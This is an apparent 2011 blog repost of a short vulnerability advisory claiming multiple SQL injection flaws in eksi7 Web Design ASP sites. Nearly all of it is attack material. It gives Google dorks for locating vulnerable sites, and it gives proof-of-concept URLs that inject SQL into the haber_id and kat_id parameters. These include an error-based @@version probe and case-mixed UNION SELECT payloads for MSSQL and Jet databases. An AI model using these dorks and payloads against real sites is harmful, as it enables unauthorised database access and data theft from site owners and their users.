eksi7 Web Design Vulnerable to Multiple SQL Injection ~ Random stuff by yappare

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection

on April 05, 2011 No comments

Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"

MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]

POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version

JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]

POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a

thanks,
-p0pc0rn-

Random stuff by yappare

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories